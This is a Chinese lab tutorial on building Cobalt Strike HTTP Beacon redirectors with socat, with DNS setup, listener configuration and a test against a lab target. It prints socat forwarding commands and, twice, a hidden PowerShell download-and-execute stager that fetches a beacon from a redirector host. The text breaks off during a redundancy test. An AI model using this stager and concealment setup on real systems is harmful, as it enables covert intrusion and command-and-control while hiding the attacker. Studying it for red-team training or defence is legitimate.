149.网络安全渗透测试—[Cobalt Strike系列]—[HTTP Beacon重定器/代理服务器/流量走向分析]

我认为，无论是学习安全还是从事安全的人多多少少都会有些许的情怀和使命感！！！

文章目录

一、Cobalt Strike 重定器

1、Cobalt Strike 重定器简介

（1）重定器简介
“重定器”是一个在“cobalt strike”服务器和目标网络之间的服务器。这个“重定器”的作用是对你团队服务器下的连接进行任意的连接或返回。（注：即通常说的代理服务器或端口转发工具），“重定器”服务（在攻击和防御中）是很重要的角色。

（2）重定器功能
第一保护team server团队服务器地址，并作为攻击者，它也是一个很好的安全操作。
第二它给予了热冗余备份能力，假如你的众多重定器中有一两个堵塞了没有大不了的，还可以通过其他的重定器进行通信。

（3）重定器拓扑
Windows Server 2019kaliUbunt1Ubunt2Windows Server 2008充当DSN服务器充当team server团队服务器充当重定器1（即代理服务器1）充当重定器2（即代理服务器2）充当靶机
在这里插入图片描述

2、重定器用到的端口转发工具

工具socat是一款端口重定向工具，我们用它来建立80端口上的连接管理，并且继续在80端口运行那个连接团队服务器的连接。（即监听本地80端口，把向本地80的连接请求转发给teamserver团队服务器的80）

充当重定器的linux系统上的命令：

socat TCP4-LISTEN:80,fork TCP4:[team server]:80

二、cobalt strike重定器实验

1、实验背景

（1）网络环境：NAT

（1）dns服务器 windows server2019： 192.168.97.19
（2）team server服务器 kali：192.168.97.129
（3）重定器1 ubuntu14：192.168.97.202
（4）重定器2 ubuntu16：192.168.97.203
（5）靶机 windows server 2008：192.168.97.131

（2）DNS服务器：Windows Server 2019

在这里插入图片描述

第一步：新建域名 team.com
添加一个a记录测试是否成功：ceshi.team.com 192.168.97.19
在这里插入图片描述

第二步：然后添加以下a记录
Teamserver：192.168.97.129 t.team.com
ubuntu跳板 1：192.168.97.202 r1.team.com
ubuntu跳板2： 192.168.97.203 r2.team.com
在这里插入图片描述

（3）team server团队服务器：kali linux

vim /etc/network/interfaces
在这里插入图片描述
vim /etc/resolv.conf

（4）重定器1：Ubuntu14.04.5

在这里插入图片描述

（5）重定器2：Ubuntu16.04.3
在这里插入图片描述

（6）靶机：Windows Server 2008
在这里插入图片描述

2、实验过程

（1）kali开启teamserver团队服务器：

./teamserver 192.168.97.129 123456

//注意：这里要用IP地址，不能使用域名
在这里插入图片描述
（2）本地连接teamserver团队服务器：

./cobaltstrike

//注意：这里不再新开虚拟机充当攻击者团队成员了，直接使用kali本地连接到teamserver，因为一样都是在团队服务器上操作。
在这里插入图片描述

（3）所有ubuntu跳板开启端口转发：

socat TCP4-LISTEN:80,fork TCP4:ts.team.com:80

//解释1：TCP4-LISTEN:80是监听本地的80端口
//解释2：fork TCP4:t.team.com:80是把监听到的本地端口的连接重定向到teamserver的80端口
//总结：只要是对跳板机的80请求，都会重定向到teamserver，因此在以后的监听器和攻击载荷配置的时候基本上可以把跳板当作teamserver来配置的时候进行配置。（具体操作在下面）
//如下图所示：
在这里插入图片描述

（4）测试重定向是否成功：
第一步：在team server上打开cs 的web日志浏览器
//如下图所示：点击View选项卡，选择Web Log
在这里插入图片描述
第二步：在dns服务器的火狐浏览器上访问

http://r1.team.com/r1

//如下图所示：此时r1接收到dns服务器发来的80请求，r1通过socat把80请求重定向到team server，因此team server会记录到来自r1的请求。
在这里插入图片描述

在这里插入图片描述

第三步：在dns服务器的火狐浏览器访问

http://r2.team.com/r2

//如下图所示：此时r2接收到dns服务器发来的80请求，r2通过socat会把80请求重定向到team server，因此team server会记录到来自r2的请求。
在这里插入图片描述

（5）配置监听器注意事项
注意1：监听器的的第一个host填写team server真实地址
注意2：监听器的的第二个host填写team server所有重定器地址
附：生成攻击载荷的时候host填写任意一个team server的重定器地址（只是为了提供下载），从而隐藏真正的team server地址。
在这里插入图片描述
（6）配置监听器
//如下图所示：这里的host填写的是beacon的真实地址，也就是teamserver团队服务器的地址

//如下图所示：其中英文This beacon uses HTTP to check for taskings.Please provide thedomains to use for beaconing.The A record for these domainsmust point to your Cobalt strike system. An lP address is OK.separate each host or domain with a comma.的翻译如下：此信标使用HTTP检查任务。请提供用于信标的域。这些域的A记录必须指向您的Cobalt打击系统。IP地址可以。用逗号分隔每个主机或域。（因此：这里填写的是指向teamserver团队服务器的众多重定器）
在这里插入图片描述

（7）生成payload攻击载荷：使用

脚本web传递

//如下图所示：生成攻击载荷的时候host填写任意一个team server的重定器地址（只是为了提供下载），从而隐藏真正的team server地址。
在这里插入图片描述
//如下图所示：保存下来payload

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://r2.team.com:80/a'))"

在这里插入图片描述
（8）靶机运行payload：

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://r2.team.com:80/a'))"

//如下图所示：在靶机上运行payload
在这里插入图片描述
//如下图所示：在team server的web日志上记录了跳板r2向team server的请求（实际为靶机向r2请求，r2转到了team server）

（9）team server上移除会话，断开r2跳板机的socat端口转发，靶机重新使用一次payload，测试冗余功能
//如下图所示：team server移除连接